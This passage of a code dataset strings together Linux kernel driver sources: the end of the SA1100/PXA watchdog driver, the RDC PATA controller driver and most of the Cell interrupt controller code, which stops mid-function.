{
	if (len)
		/* Refresh OSMR3 timer. */
		OSMR3 = OSCR + pre_margin;
	return len;
}
static const struct watchdog_info ident = {
	.options	= WDIOF_CARDRESET | WDIOF_SETTIMEOUT
				| WDIOF_KEEPALIVEPING,
	.identity	= "SA1100/PXA255 Watchdog",
	.firmware_version	= 1,
};
/*
 * Standard watchdog ioctl set.  SETTIMEOUT rejects values whose tick
 * count would overflow the 32-bit OSCR comparison window, converts the
 * new margin to ticks and immediately refreshes the match register,
 * then falls through to report the effective timeout.
 */
static long sa1100dog_ioctl(struct file *file, unsigned int cmd,
							unsigned long arg)
{
	int ret = -ENOTTY;
	int time;
	void __user *argp = (void __user *)arg;
	int __user *p = argp;
	switch (cmd) {
	case WDIOC_GETSUPPORT:
		ret = copy_to_user(argp, &ident,
				   sizeof(ident)) ? -EFAULT : 0;
		break;
	case WDIOC_GETSTATUS:
		ret = put_user(0, p);
		break;
	case WDIOC_GETBOOTSTATUS:
		ret = put_user(boot_status, p);
		break;
	case WDIOC_KEEPALIVE:
		OSMR3 = OSCR + pre_margin;
		ret = 0;
		break;
	case WDIOC_SETTIMEOUT:
		ret = get_user(time, p);
		if (ret)
			break;
		/* new margin must fit in the 32-bit tick window */
		if (time <= 0 || (oscr_freq * (long long)time >= 0xffffffff)) {
			ret = -EINVAL;
			break;
		}
		pre_margin = oscr_freq * time;
		OSMR3 = OSCR + pre_margin;
		/*fall through*/
	case WDIOC_GETTIMEOUT:
		ret = put_user(pre_margin / oscr_freq, p);
		break;
	}
	return ret;
}
/* file_operations for the watchdog character device */
static const struct file_operations sa1100dog_fops = {
	.owner		= THIS_MODULE,
	.llseek		= no_llseek,
	.write		= sa1100dog_write,
	.unlocked_ioctl	= sa1100dog_ioctl,
	.open		= sa1100dog_open,
	.release	= sa1100dog_release,
};
/* registered as the standard misc "watchdog" device */
static struct miscdevice sa1100dog_miscdev = {
	.minor		= WATCHDOG_MINOR,
	.name		= "watchdog",
	.fops		= &sa1100dog_fops,
};
static int margin __initdata = 60;	/* (secs) Default is 1 minute */
/*
 * Module init: capture the OS timer tick rate and the reset reason,
 * precompute the tick margin, then register the misc device.
 */
static int __init sa1100dog_init(void)
{
	int ret;
	oscr_freq = get_clock_tick_rate();
	/*
	 * Read the reset status, and save it for later.  If
	 * we suspend, RCSR will be cleared, and the watchdog
	 * reset reason will be lost.
	 */
	boot_status = (reset_status & RESET_STATUS_WATCHDOG) ?
				WDIOF_CARDRESET : 0;
	/* convert the second-based margin parameter to timer ticks */
	pre_margin = oscr_freq * margin;
	ret = misc_register(&sa1100dog_miscdev);
	if (ret == 0)
		printk(KERN_INFO
		       "SA1100/PXA2xx Watchdog Timer: timer margin %d sec\n",
		       margin);
	return ret;
}
/* Module teardown: unregister the misc device.  Note that if the
 * watchdog was armed, the hardware timer keeps running (see the
 * comment above sa1100dog_release()). */
static void __exit sa1100dog_exit(void)
{
	misc_deregister(&sa1100dog_miscdev);
}
module_init(sa1100dog_init);
module_exit(sa1100dog_exit);
MODULE_AUTHOR("Oleg Drokin <green@crimea.edu>");
MODULE_DESCRIPTION("SA1100/PXA2xx Watchdog");
module_param(margin, int, 0);
MODULE_PARM_DESC(margin, "Watchdog margin in seconds (default 60s)");
MODULE_LICENSE("GPL");
MODULE_ALIAS_MISCDEV(WATCHDOG_MINOR);
| gpl-2.0 |
felipesanches/linux-sunxi | drivers/ata/pata_rdc.c | 5121 | 11221 | /*
* pata_rdc - Driver for later RDC PATA controllers
*
* This is actually a driver for hardware meeting
* INCITS 370-2004 (1510D): ATA Host Adapter Standards
*
* Based on ata_piix.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2, or (at your option)
* any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; see the file COPYING. If not, write to
* the Free Software Foundation, 675 Mass Ave, Cambridge, MA 02139, USA.
*/
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/pci.h>
#include <linux/init.h>
#include <linux/blkdev.h>
#include <linux/delay.h>
#include <linux/device.h>
#include <linux/gfp.h>
#include <scsi/scsi_host.h>
#include <linux/libata.h>
#include <linux/dmi.h>
#define DRV_NAME	"pata_rdc"
#define DRV_VERSION	"0.01"
/* Per-host private data: IOCFG (PCI config reg 0x54) is saved at probe
 * time and used for cable detection and restoration on remove. */
struct rdc_host_priv {
	u32 saved_iocfg;
};
/**
 * rdc_pata_cable_detect - Probe host controller cable detect info
 * @ap: Port for which cable detect info is desired
 *
 * Read 80c cable indicator from ATA PCI device's PCI config
 * register. This register is normally set by firmware (BIOS).
 *
 * LOCKING:
 * None (inherited from caller).
 */
static int rdc_pata_cable_detect(struct ata_port *ap)
{
	struct rdc_host_priv *hpriv = ap->host->private_data;
	u8 cable_bits = 0x30 << (2 * ap->port_no);

	/* A clear cable-detect field in the saved IOCFG register means
	 * the firmware found a 40-wire cable on this port. */
	return (hpriv->saved_iocfg & cable_bits) ? ATA_CBL_PATA80
						 : ATA_CBL_PATA40;
}
/**
 * rdc_pata_prereset - prereset for PATA host controller
 * @link: Target link
 * @deadline: deadline jiffies for the operation
 *
 * Returns -ENOENT if firmware left this port disabled in PCI config
 * space, otherwise defers to the generic SFF prereset.
 *
 * LOCKING:
 * None (inherited from caller).
 */
static int rdc_pata_prereset(struct ata_link *link, unsigned long deadline)
{
	struct ata_port *ap = link->ap;
	struct pci_dev *pdev = to_pci_dev(ap->host->dev);
	static const struct pci_bits rdc_enable_bits[] = {
		{ 0x41U, 1U, 0x80UL, 0x80UL },	/* port 0 */
		{ 0x43U, 1U, 0x80UL, 0x80UL },	/* port 1 */
	};
	if (!pci_test_config_bits(pdev, &rdc_enable_bits[ap->port_no]))
		return -ENOENT;
	return ata_sff_prereset(link, deadline);
}
/* Serializes read-modify-write of the shared timing registers across
 * ports and devices. */
static DEFINE_SPINLOCK(rdc_lock);
/**
 * rdc_set_piomode - Initialize host controller PATA PIO timings
 * @ap: Port whose timings we are configuring
 * @adev: Device whose PIO timings to program
 *
 * Set PIO mode for device, in host controller PCI config space.
 * The master/slave timing registers are read-modify-written under
 * rdc_lock; the per-device UDMA enable bit is cleared here and is
 * re-enabled by rdc_set_dmamode() if a UDMA mode is selected.
 *
 * LOCKING:
 * None (inherited from caller).
 */
static void rdc_set_piomode(struct ata_port *ap, struct ata_device *adev)
{
	unsigned int pio = adev->pio_mode - XFER_PIO_0;
	struct pci_dev *dev = to_pci_dev(ap->host->dev);
	unsigned long flags;
	unsigned int is_slave = (adev->devno != 0);
	unsigned int master_port= ap->port_no ? 0x42 : 0x40;
	unsigned int slave_port = 0x44;
	u16 master_data;
	u8 slave_data;
	u8 udma_enable;
	int control = 0;
	/* per-PIO-mode ISP/RTC timing nibbles */
	static const	 /* ISP  RTC */
	u8 timings[][2]	= { { 0, 0 },
			    { 0, 0 },
			    { 1, 0 },
			    { 2, 1 },
			    { 2, 3 }, };
	if (pio >= 2)
		control |= 1;	/* TIME1 enable */
	if (ata_pio_need_iordy(adev))
		control |= 2;	/* IE enable */
	if (adev->class == ATA_DEV_ATA)
		control |= 4;	/* PPE enable */
	spin_lock_irqsave(&rdc_lock, flags);
	/* PIO configuration clears DTE unconditionally.  It will be
	 * programmed in set_dmamode which is guaranteed to be called
	 * after set_piomode if any DMA mode is available.
	 */
	pci_read_config_word(dev, master_port, &master_data);
	if (is_slave) {
		/* clear TIME1|IE1|PPE1|DTE1 */
		master_data &= 0xff0f;
		/* Enable SITRE (separate slave timing register) */
		master_data |= 0x4000;
		/* enable PPE1, IE1 and TIME1 as needed */
		master_data |= (control << 4);
		pci_read_config_byte(dev, slave_port, &slave_data);
		/* keep the other port's nibble intact */
		slave_data &= (ap->port_no ? 0x0f : 0xf0);
		/* Load the timing nibble for this slave */
		slave_data |= ((timings[pio][0] << 2) | timings[pio][1])
				<< (ap->port_no ? 4 : 0);
	} else {
		/* clear ISP|RCT|TIME0|IE0|PPE0|DTE0 */
		master_data &= 0xccf0;
		/* Enable PPE, IE and TIME as appropriate */
		master_data |= control;
		/* load ISP and RCT */
		master_data |=
			(timings[pio][0] << 12) |
			(timings[pio][1] << 8);
	}
	pci_write_config_word(dev, master_port, master_data);
	if (is_slave)
		pci_write_config_byte(dev, slave_port, slave_data);
	/* Ensure the UDMA bit is off - it will be turned back on if
	   UDMA is selected */
	pci_read_config_byte(dev, 0x48, &udma_enable);
	udma_enable &= ~(1 << (2 * ap->port_no + adev->devno));
	pci_write_config_byte(dev, 0x48, udma_enable);
	spin_unlock_irqrestore(&rdc_lock, flags);
}
/**
 * rdc_set_dmamode - Initialize host controller PATA DMA timings
 * @ap: Port whose timings we are configuring
 * @adev: Drive in question
 *
 * Set UDMA mode for device, in host controller PCI config space.
 * For UDMA modes, program the UDMA timing/clock registers and set the
 * per-device UDMA enable bit; for MWDMA, derive the timings from the
 * corresponding PIO mode and clear the UDMA enable bit.
 *
 * LOCKING:
 * None (inherited from caller).
 */
static void rdc_set_dmamode(struct ata_port *ap, struct ata_device *adev)
{
	struct pci_dev *dev = to_pci_dev(ap->host->dev);
	unsigned long flags;
	u8 master_port = ap->port_no ? 0x42 : 0x40;
	u16 master_data;
	u8 speed = adev->dma_mode;
	/* device index 0-3: two devices per port */
	int devid = adev->devno + 2 * ap->port_no;
	u8 udma_enable = 0;
	static const	 /* ISP  RTC */
	u8 timings[][2]	= { { 0, 0 },
			    { 0, 0 },
			    { 1, 0 },
			    { 2, 1 },
			    { 2, 3 }, };
	spin_lock_irqsave(&rdc_lock, flags);
	pci_read_config_word(dev, master_port, &master_data);
	pci_read_config_byte(dev, 0x48, &udma_enable);
	if (speed >= XFER_UDMA_0) {
		unsigned int udma = adev->dma_mode - XFER_UDMA_0;
		u16 udma_timing;
		u16 ideconf;
		int u_clock, u_speed;
		/*
		 * UDMA is handled by a combination of clock switching and
		 * selection of dividers
		 *
		 * Handy rule: Odd modes are UDMATIMx 01, even are 02
		 *	       except UDMA0 which is 00
		 */
		u_speed = min(2 - (udma & 1), udma);
		if (udma == 5)
			u_clock = 0x1000;	/* 100Mhz */
		else if (udma > 2)
			u_clock = 1;		/* 66Mhz */
		else
			u_clock = 0;		/* 33Mhz */
		udma_enable |= (1 << devid);
		/* Load the CT/RP selection */
		pci_read_config_word(dev, 0x4A, &udma_timing);
		udma_timing &= ~(3 << (4 * devid));
		udma_timing |= u_speed << (4 * devid);
		pci_write_config_word(dev, 0x4A, udma_timing);
		/* Select a 33/66/100Mhz clock */
		pci_read_config_word(dev, 0x54, &ideconf);
		ideconf &= ~(0x1001 << devid);
		ideconf |= u_clock << devid;
		pci_write_config_word(dev, 0x54, ideconf);
	} else {
		/*
		 * MWDMA is driven by the PIO timings. We must also enable
		 * IORDY unconditionally along with TIME1. PPE has already
		 * been set when the PIO timing was set.
		 */
		unsigned int mwdma = adev->dma_mode - XFER_MW_DMA_0;
		unsigned int control;
		u8 slave_data;
		/* PIO mode whose timings match each MWDMA mode */
		const unsigned int needed_pio[3] = {
			XFER_PIO_0, XFER_PIO_3, XFER_PIO_4
		};
		int pio = needed_pio[mwdma] - XFER_PIO_0;
		control = 3;	/* IORDY|TIME1 */
		/* If the drive MWDMA is faster than it can do PIO then
		   we must force PIO into PIO0 */
		if (adev->pio_mode < needed_pio[mwdma])
			/* Enable DMA timing only */
			control |= 8;	/* PIO cycles in PIO0 */
		if (adev->devno) {	/* Slave */
			master_data &= 0xFF4F;  /* Mask out IORDY|TIME1|DMAONLY */
			master_data |= control << 4;
			pci_read_config_byte(dev, 0x44, &slave_data);
			slave_data &= (ap->port_no ? 0x0f : 0xf0);
			/* Load the matching timing */
			slave_data |= ((timings[pio][0] << 2) | timings[pio][1]) << (ap->port_no ? 4 : 0);
			pci_write_config_byte(dev, 0x44, slave_data);
		} else { 	/* Master */
			master_data &= 0xCCF4;	/* Mask out IORDY|TIME1|DMAONLY
						   and master timing bits */
			master_data |= control;
			master_data |=
				(timings[pio][0] << 12) |
				(timings[pio][1] << 8);
		}
		udma_enable &= ~(1 << devid);
		pci_write_config_word(dev, master_port, master_data);
	}
	pci_write_config_byte(dev, 0x48, udma_enable);
	spin_unlock_irqrestore(&rdc_lock, flags);
}
/* Inherit the generic 32-bit BMDMA operations; override only cable
 * detection, timing programming and prereset. */
static struct ata_port_operations rdc_pata_ops = {
	.inherits		= &ata_bmdma32_port_ops,
	.cable_detect		= rdc_pata_cable_detect,
	.set_piomode		= rdc_set_piomode,
	.set_dmamode		= rdc_set_dmamode,
	.prereset		= rdc_pata_prereset,
};
/* Capabilities: PIO0-4, MWDMA1-2, UDMA0-5, master+slave devices */
static struct ata_port_info rdc_port_info = {
	.flags		= ATA_FLAG_SLAVE_POSS,
	.pio_mask	= ATA_PIO4,
	.mwdma_mask	= ATA_MWDMA12_ONLY,
	.udma_mask	= ATA_UDMA5,
	.port_ops	= &rdc_pata_ops,
};
static struct scsi_host_template rdc_sht = {
	ATA_BMDMA_SHT(DRV_NAME),
};
/**
 * rdc_init_one - Register RDC ATA PCI device with kernel services
 * @pdev: PCI device to register
 * @ent: Entry in rdc_pci_tbl matching with @pdev
 *
 * Called from kernel PCI layer.  Enables the device, saves the IOCFG
 * register, prepares a two-port BMDMA host and hands over control to
 * libata for the rest.
 *
 * LOCKING:
 * Inherited from PCI layer (may sleep).
 *
 * RETURNS:
 * Zero on success, or -ERRNO value.
 */
static int __devinit rdc_init_one(struct pci_dev *pdev,
				  const struct pci_device_id *ent)
{
	struct device *dev = &pdev->dev;
	struct ata_port_info port_info[2];
	const struct ata_port_info *ppi[] = { &port_info[0], &port_info[1] };
	unsigned long port_flags;
	struct ata_host *host;
	struct rdc_host_priv *hpriv;
	int rc;
	ata_print_version_once(&pdev->dev, DRV_VERSION);
	/* both ports use the same capabilities */
	port_info[0] = rdc_port_info;
	port_info[1] = rdc_port_info;
	port_flags = port_info[0].flags;
	/* enable device and prepare host */
	rc = pcim_enable_device(pdev);
	if (rc)
		return rc;
	hpriv = devm_kzalloc(dev, sizeof(*hpriv), GFP_KERNEL);
	if (!hpriv)
		return -ENOMEM;
	/* Save IOCFG, this will be used for cable detection, quirk
	 * detection and restoration on detach.
	 */
	pci_read_config_dword(pdev, 0x54, &hpriv->saved_iocfg);
	rc = ata_pci_bmdma_prepare_host(pdev, ppi, &host);
	if (rc)
		return rc;
	host->private_data = hpriv;
	pci_intx(pdev, 1);
	/* the two ports are independent; scan them in parallel */
	host->flags |= ATA_HOST_PARALLEL_SCAN;
	pci_set_master(pdev);
	return ata_pci_sff_activate_host(host, ata_bmdma_interrupt, &rdc_sht);
}
/* Detach: restore the IOCFG register saved at probe time, then let
 * libata tear the host down. */
static void rdc_remove_one(struct pci_dev *pdev)
{
	struct ata_host *host = dev_get_drvdata(&pdev->dev);
	struct rdc_host_priv *hpriv = host->private_data;
	pci_write_config_dword(pdev, 0x54, hpriv->saved_iocfg);
	ata_pci_remove_one(pdev);
}
/* PCI IDs of the supported RDC PATA controllers */
static const struct pci_device_id rdc_pci_tbl[] = {
	{ PCI_DEVICE(0x17F3, 0x1011), },
	{ PCI_DEVICE(0x17F3, 0x1012), },
	{ }	/* terminate list */
};
static struct pci_driver rdc_pci_driver = {
	.name			= DRV_NAME,
	.id_table		= rdc_pci_tbl,
	.probe			= rdc_init_one,
	.remove			= rdc_remove_one,
#ifdef CONFIG_PM
	/* generic libata PCI suspend/resume is sufficient here */
	.suspend		= ata_pci_device_suspend,
	.resume			= ata_pci_device_resume,
#endif
};
/* Module entry/exit: plain PCI driver registration. */
static int __init rdc_init(void)
{
	return pci_register_driver(&rdc_pci_driver);
}
static void __exit rdc_exit(void)
{
	pci_unregister_driver(&rdc_pci_driver);
}
module_init(rdc_init);
module_exit(rdc_exit);
MODULE_AUTHOR("Alan Cox (based on ata_piix)");
MODULE_DESCRIPTION("SCSI low-level driver for RDC PATA controllers");
MODULE_LICENSE("GPL");
MODULE_DEVICE_TABLE(pci, rdc_pci_tbl);
MODULE_VERSION(DRV_VERSION);
| gpl-2.0 |
bowser-boot/bowser-kernel | arch/powerpc/platforms/cell/interrupt.c | 7169 | 10746 | /*
* Cell Internal Interrupt Controller
*
* Copyright (C) 2006 Benjamin Herrenschmidt (benh@kernel.crashing.org)
* IBM, Corp.
*
* (C) Copyright IBM Deutschland Entwicklung GmbH 2005
*
* Author: Arnd Bergmann <arndb@de.ibm.com>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2, or (at your option)
* any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
*
* TODO:
* - Fix various assumptions related to HW CPU numbers vs. linux CPU numbers
* vs node numbers in the setup code
* - Implement proper handling of maxcpus=1/2 (that is, routing of irqs from
* a non-active node to the active node)
*/
#include <linux/interrupt.h>
#include <linux/irq.h>
#include <linux/export.h>
#include <linux/percpu.h>
#include <linux/types.h>
#include <linux/ioport.h>
#include <linux/kernel_stat.h>
#include <asm/io.h>
#include <asm/pgtable.h>
#include <asm/prom.h>
#include <asm/ptrace.h>
#include <asm/machdep.h>
#include <asm/cell-regs.h>
#include "interrupt.h"
/* Per-hardware-thread IIC state */
struct iic {
	struct cbe_iic_thread_regs __iomem *regs;	/* mapped thread regs */
	u8 target_id;		/* interrupt destination id of this thread */
	u8 eoi_stack[16];	/* priorities pushed in iic_get_irq(),
				 * popped and restored in iic_eoi() */
	int eoi_ptr;		/* top-of-stack index for eoi_stack */
	struct device_node *node;	/* IIC DT node (holds a reference) */
};
static DEFINE_PER_CPU(struct iic, cpu_iic);
#define IIC_NODE_COUNT	2
/* single linear irq_domain covering all IIC sources */
static struct irq_domain *iic_host;
/* Convert between "pending" bits and hw irq number */
static irq_hw_number_t iic_pending_to_hwnum(struct cbe_iic_pending_bits bits)
{
	unsigned char dev = bits.source & 0xf;
	unsigned char nid = bits.source >> 4;
	unsigned char cls = bits.class & 3;

	/* IPIs encode the message in the priority nibble; all other
	 * sources are packed as node | class | unit. */
	if (bits.flags & CBE_IIC_IRQ_IPI)
		return IIC_IRQ_TYPE_IPI | (bits.prio >> 4);
	return (nid << IIC_IRQ_NODE_SHIFT) | (cls << 4) | dev;
}
/* Mask/unmask are intentionally empty for this chip. */
static void iic_mask(struct irq_data *d)
{
}
static void iic_unmask(struct irq_data *d)
{
}
/*
 * EOI: restore the priority that was in effect before this interrupt
 * was taken (pushed onto eoi_stack in iic_get_irq()).
 */
static void iic_eoi(struct irq_data *d)
{
	struct iic *iic = &__get_cpu_var(cpu_iic);
	out_be64(&iic->regs->prio, iic->eoi_stack[--iic->eoi_ptr]);
	BUG_ON(iic->eoi_ptr < 0);
}
static struct irq_chip iic_chip = {
	.name = "CELL-IIC",
	.irq_mask = iic_mask,
	.irq_unmask = iic_unmask,
	.irq_eoi = iic_eoi,
};
/* I/O exception sources are acked inside the cascade handler, so the
 * per-irq EOI is a no-op. */
static void iic_ioexc_eoi(struct irq_data *d)
{
}
/*
 * Demultiplex the node's I/O exception status register: edge sources
 * are acked before handling, level sources after, looping until the
 * status register reads back empty.
 */
static void iic_ioexc_cascade(unsigned int irq, struct irq_desc *desc)
{
	struct irq_chip *chip = irq_desc_get_chip(desc);
	struct cbe_iic_regs __iomem *node_iic =
		(void __iomem *)irq_desc_get_handler_data(desc);
	/* NOTE(review): base is derived from the Linux irq number, which
	 * assumes virq numbering mirrors hw numbering -- verify against
	 * the irq_domain mapping. */
	unsigned int base = (irq & 0xffffff00) | IIC_IRQ_TYPE_IOEXC;
	unsigned long bits, ack;
	int cascade;
	for (;;) {
		bits = in_be64(&node_iic->iic_is);
		if (bits == 0)
			break;
		/* pre-ack edge interrupts */
		ack = bits & IIC_ISR_EDGE_MASK;
		if (ack)
			out_be64(&node_iic->iic_is, ack);
		/* handle them, highest bit (source 0) first */
		for (cascade = 63; cascade >= 0; cascade--)
			if (bits & (0x8000000000000000UL >> cascade)) {
				unsigned int cirq =
					irq_linear_revmap(iic_host,
							  base | cascade);
				if (cirq != NO_IRQ)
					generic_handle_irq(cirq);
			}
		/* post-ack level interrupts */
		ack = bits & ~IIC_ISR_EDGE_MASK;
		if (ack)
			out_be64(&node_iic->iic_is, ack);
	}
	chip->irq_eoi(&desc->irq_data);
}
static struct irq_chip iic_ioexc_chip = {
	.name = "CELL-IOEX",
	.irq_mask = iic_mask,
	.irq_unmask = iic_unmask,
	.irq_eoi = iic_ioexc_eoi,
};
/* Get an IRQ number from the pending state register of the IIC */
static unsigned int iic_get_irq(void)
{
	struct cbe_iic_pending_bits pending;
	struct iic *iic;
	unsigned int virq;
	iic = &__get_cpu_var(cpu_iic);
	/* reading pending_destr latches and pops the pending state */
	*(unsigned long *) &pending =
		in_be64((u64 __iomem *) &iic->regs->pending_destr);
	if (!(pending.flags & CBE_IIC_IRQ_VALID))
		return NO_IRQ;
	virq = irq_linear_revmap(iic_host, iic_pending_to_hwnum(pending));
	if (virq == NO_IRQ)
		return NO_IRQ;
	/* remember the pre-interrupt priority; iic_eoi() restores it */
	iic->eoi_stack[++iic->eoi_ptr] = pending.prio;
	BUG_ON(iic->eoi_ptr > 15);
	return virq;
}
/* Open this CPU's interrupt priority gate fully (accept everything). */
void iic_setup_cpu(void)
{
	out_be64(&__get_cpu_var(cpu_iic).regs->prio, 0xff);
}
/* Return the interrupt destination id assigned to @cpu in init_one_iic(). */
u8 iic_get_target_id(int cpu)
{
	return per_cpu(cpu_iic, cpu).target_id;
}
EXPORT_SYMBOL_GPL(iic_get_target_id);
#ifdef CONFIG_SMP
/* Use the highest interrupt priorities for IPI */
static inline int iic_msg_to_irq(int msg)
{
	return IIC_IRQ_TYPE_IPI + 0xf - msg;
}
/* Raise an IPI on @cpu by writing the message's priority nibble into
 * that CPU's "generate" register. */
void iic_message_pass(int cpu, int msg)
{
	out_be64(&per_cpu(cpu_iic, cpu).regs->generate, (0xf - msg) << 4);
}
/* A single irq_domain covers every node. */
struct irq_domain *iic_get_irq_host(int node)
{
	return iic_host;
}
EXPORT_SYMBOL_GPL(iic_get_irq_host);
/* Map one IPI message onto a virq and register it with the SMP core. */
static void iic_request_ipi(int msg)
{
	int virq;
	virq = irq_create_mapping(iic_host, iic_msg_to_irq(msg));
	if (virq == NO_IRQ) {
		printk(KERN_ERR
		       "iic: failed to map IPI %s\n", smp_ipi_name[msg]);
		return;
	}
	/*
	 * If smp_request_message_ipi encounters an error it will notify
	 * the error.  If a message is not needed it will return non-zero.
	 */
	if (smp_request_message_ipi(virq, msg))
		irq_dispose_mapping(virq);
}
/* Request all four standard powerpc IPI messages. */
void iic_request_IPIs(void)
{
	iic_request_ipi(PPC_MSG_CALL_FUNCTION);
	iic_request_ipi(PPC_MSG_RESCHEDULE);
	iic_request_ipi(PPC_MSG_CALL_FUNC_SINGLE);
	iic_request_ipi(PPC_MSG_DEBUGGER_BREAK);
}
#endif /* CONFIG_SMP */
/* The domain matches only the CBEA internal interrupt controller node. */
static int iic_host_match(struct irq_domain *h, struct device_node *node)
{
	return of_device_is_compatible(node,
				    "IBM,CBEA-Internal-Interrupt-Controller");
}
/*
 * Attach the right chip/flow handler for a freshly mapped hw irq:
 * IPIs are per-cpu, I/O exceptions use the ioexc chip, everything
 * else uses the plain IIC chip with edge-EOI flow.
 */
static int iic_host_map(struct irq_domain *h, unsigned int virq,
			irq_hw_number_t hw)
{
	unsigned int type = hw & IIC_IRQ_TYPE_MASK;

	if (type == IIC_IRQ_TYPE_IPI)
		irq_set_chip_and_handler(virq, &iic_chip, handle_percpu_irq);
	else if (type == IIC_IRQ_TYPE_IOEXC)
		irq_set_chip_and_handler(virq, &iic_ioexc_chip,
					 handle_edge_eoi_irq);
	else
		irq_set_chip_and_handler(virq, &iic_chip, handle_edge_eoi_irq);
	return 0;
}
/*
 * Translate a one-cell DT interrupt specifier (node:8 ext:8 class:8
 * unit:8) into a linear hw irq number for this domain.
 */
static int iic_host_xlate(struct irq_domain *h, struct device_node *ct,
			   const u32 *intspec, unsigned int intsize,
			   irq_hw_number_t *out_hwirq, unsigned int *out_flags)
{
	unsigned int node, ext, unit, class;
	const u32 *val;
	if (!of_device_is_compatible(ct,
				     "IBM,CBEA-Internal-Interrupt-Controller"))
		return -ENODEV;
	if (intsize != 1)
		return -ENODEV;
	val = of_get_property(ct, "#interrupt-cells", NULL);
	if (val == NULL || *val != 1)
		return -ENODEV;
	/* unpack the four byte fields of the specifier cell */
	node = intspec[0] >> 24;
	ext = (intspec[0] >> 16) & 0xff;
	class = (intspec[0] >> 8) & 0xff;
	unit = intspec[0] & 0xff;
	/* Check if node is in supported range */
	if (node > 1)
		return -EINVAL;
	/* Build up interrupt number, special case for IO exceptions */
	*out_hwirq = (node << IIC_IRQ_NODE_SHIFT);
	if (unit == IIC_UNIT_IIC && class == 1)
		*out_hwirq |= IIC_IRQ_TYPE_IOEXC | ext;
	else
		*out_hwirq |= IIC_IRQ_TYPE_NORMAL |
			(class << IIC_IRQ_CLASS_SHIFT) | unit;
	/* Dummy flags, ignored by iic code */
	*out_flags = IRQ_TYPE_EDGE_RISING;
	return 0;
}
/* irq_domain callbacks for the IIC linear domain */
static const struct irq_domain_ops iic_host_ops = {
	.match = iic_host_match,
	.map = iic_host_map,
	.xlate = iic_host_xlate,
};
/*
 * Map and initialise the thread registers of one hardware thread's
 * IIC and derive its interrupt destination id.
 */
static void __init init_one_iic(unsigned int hw_cpu, unsigned long addr,
				struct device_node *node)
{
	/* XXX FIXME: should locate the linux CPU number from the HW cpu
	 * number properly. We are lucky for now
	 */
	struct iic *iic = &per_cpu(cpu_iic, hw_cpu);
	iic->regs = ioremap(addr, sizeof(struct cbe_iic_thread_regs));
	BUG_ON(iic->regs == NULL);
	/* destination id encodes node (bit of hw_cpu) and thread */
	iic->target_id = ((hw_cpu & 2) << 3) | ((hw_cpu & 1) ? 0xf : 0xe);
	/* bottom of the EOI stack: fully open priority gate */
	iic->eoi_stack[0] = 0xff;
	iic->node = of_node_get(node);
	/* accept no interrupts until iic_setup_cpu() runs */
	out_be64(&iic->regs->prio, 0);
	printk(KERN_INFO "IIC for CPU %d target id 0x%x : %s\n",
	       hw_cpu, iic->target_id, node->full_name);
}
/*
 * Discover every IIC node in the device tree, initialise the two
 * hardware threads it serves and wire up the I/O exception cascade.
 * Returns 0 if at least one IIC was found, -ENODEV otherwise.
 */
static int __init setup_iic(void)
{
	struct device_node *dn;
	struct resource r0, r1;
	unsigned int node, cascade, found = 0;
	struct cbe_iic_regs __iomem *node_iic;
	const u32 *np;
	for (dn = NULL;
	     (dn = of_find_node_by_name(dn,"interrupt-controller")) != NULL;) {
		if (!of_device_is_compatible(dn,
				     "IBM,CBEA-Internal-Interrupt-Controller"))
			continue;
		/* the two served hardware threads, one register bank each */
		np = of_get_property(dn, "ibm,interrupt-server-ranges", NULL);
		if (np == NULL) {
			printk(KERN_WARNING "IIC: CPU association not found\n");
			of_node_put(dn);
			return -ENODEV;
		}
		if (of_address_to_resource(dn, 0, &r0) ||
		    of_address_to_resource(dn, 1, &r1)) {
			printk(KERN_WARNING "IIC: Can't resolve addresses\n");
			of_node_put(dn);
			return -ENODEV;
		}
		found++;
		init_one_iic(np[0], r0.start, dn);
		init_one_iic(np[1], r1.start, dn);
		/* Setup cascade for IO exceptions. XXX cleanup tricks to get
		 * node vs CPU etc...
		 * Note that we configure the IIC_IRR here with a hard coded
		 * priority of 1. We might want to improve that later.
		 */
		node = np[0] >> 1;
		node_iic = cbe_get_cpu_iic_regs(np[0]);
		/* hw number of the cascade source: node | class 1 | IIC unit */
		cascade = node << IIC_IRQ_NODE_SHIFT;
		cascade |= 1 << IIC_IRQ_CLASS_SHIFT;
		cascade |= IIC_UNIT_IIC;
		cascade = irq_create_mapping(iic_host, cascade);
		if (cascade == NO_IRQ)
			continue;
		/*
		 * irq_data is a generic pointer that gets passed back
		 * to us later, so the forced cast is fine.
		 */
		irq_set_handler_data(cascade, (void __force *)node_iic);
		irq_set_chained_handler(cascade, iic_ioexc_cascade);
		out_be64(&node_iic->iic_ir,
			 (1 << 12)		/* priority */ |
			 (node << 4)		/* dest node */ |
			 IIC_UNIT_THREAD_0	/* route them to thread 0 */);
		/* Flush pending (make sure it triggers if there is
		 * anything pending
		 */
		out_be64(&node_iic->iic_is, 0xfffffffffffffffful);
	}
	if (found)
		return 0;
	else
		return -ENODEV;
}
/* Platform entry point: create the irq domain, probe the hardware and
 * install iic_get_irq() as the machine's interrupt fetch routine. */
void __init iic_init_IRQ(void)
{
	/* Setup an irq host data structure */
	iic_host = irq_domain_add_linear(NULL, IIC_SOURCE_COUNT, &iic_host_ops,
					 NULL);
	BUG_ON(iic_host == NULL);
	irq_set_default_host(iic_host);
	/* Discover and initialize iics */
	if (setup_iic() < 0)
		panic("IIC: Failed to initialize !\n");
	/* Set master interrupt handling function */
	ppc_md.get_irq = iic_get_irq;
	/* Enable on current CPU */
	iic_setup_cpu();
}
/* Program @cpu's IIC routing register so the next interrupt is taken
 * by the given node/thread at the given priority. */
void iic_set_interrupt_routing(int cpu, int thread, int priority)
{
	struct cbe_iic_regs __iomem *iic_regs = cbe_get_cpu_iic_regs(cpu);
	u64 iic_ir = 0;
	int node = cpu >> 1;	/* two hardware threads per node */
	/* Set which node and thread will handle the next interrupt */
